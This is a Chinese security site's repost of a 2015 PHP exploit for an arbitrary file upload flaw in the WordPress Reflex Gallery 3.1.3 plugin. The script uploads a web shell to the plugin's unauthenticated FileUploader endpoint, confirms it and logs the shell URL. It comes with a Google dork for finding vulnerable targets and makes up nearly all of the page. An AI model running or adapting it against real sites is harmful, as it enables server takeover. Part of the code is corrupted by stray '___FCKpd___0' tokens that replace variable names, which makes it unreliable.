首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Reflex Gallery 3.1.3 Shell Upload
来源:http://blog.inurl.com.br 作者:Pinheiro 发布时间:2015-03-17  
<?php

/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (Last)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369

--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type = "file" name = "qqfile"><br>
  <input type = "submit" name = "Submit" value = "Pwn!">
  </form >

--------------------------------------------------------------------------------

  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin   http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl/
  # YOUTUBE        https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
 */

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {

    ob_flush();
    flush();
}

function __request($params) {

    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL,
"{$params['host']}/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('qqfile' =>
"@{$params['file']}"));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    $info['corpo'] = curl_exec($objcurl) . __plus();
    $info['server'] = curl_getinfo($objcurl) . __plus();
    curl_close($objcurl) . __plus();
    return $info;
}

echo "[+]  Wordpress Plugin Reflex Gallery - Arbitrary File Upload
Vulnerability\n\n";
$params = array('file' => isset($argv[2]) ? $argv[2] : exit("\n0x[ERRO]
DEFINE FILE SHELL!\n"), 'host' => isset($argv[1]) ? (strstr($argv[1],
'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE
TARGET!\n"));
__request($params) . __plus();
___FCKpd___0
s = "{$params['host']}/wp-content/uploads/2015/03/{$params['file']}";
___FCKpd___0
h = get_headers("{$params['host']}/wp-content/uploads/2015/03/{$params['file']}", 1); foreach (
___FCKpd___0
h as $key => $value) { echo date("h:m:s") . " [INFO][{$key}]:: {$value}\n"; }
___FCKpd___0
x = (strstr((
___FCKpd___0
h[0] . (isset(
___FCKpd___0
h[1]) ?
___FCKpd___0
h[1] : NULL)), '200')); print "\n" . date("h:m:s") . " [INFO][COD]:: " . (!empty(
___FCKpd___0
x) ? '[+] VULL' : '[-] NOT VULL'); print "\n" . date("h:m:s") . " [INFO][SHELL]:: " . (!empty(
___FCKpd___0
x) ? "[+] {
___FCKpd___0
s}" . file_put_contents("Exploit_AFU.txt", "{
___FCKpd___0
s}\n\n", FILE_APPEND) : '[-] ERROR!');

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Intel Network Adapter Diagnost
·Adobe Flash Player PCRE Regex
·Android Media Integer Overflow
·Brasero CD/DVD Burner 3.4.1 Bu
·Google Android Integer Oveflow
·iPass Mobile Client Service Pr
·iPass Control Pipe Remote Comm
·Fortinet Single Sign On Stack
·Microsoft Windows Shell File F
·FastStone Image Viewer 5.3 .tg
·Microsoft Windows Shell SMB LN
·TWiki Debugenableplugins Remot
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved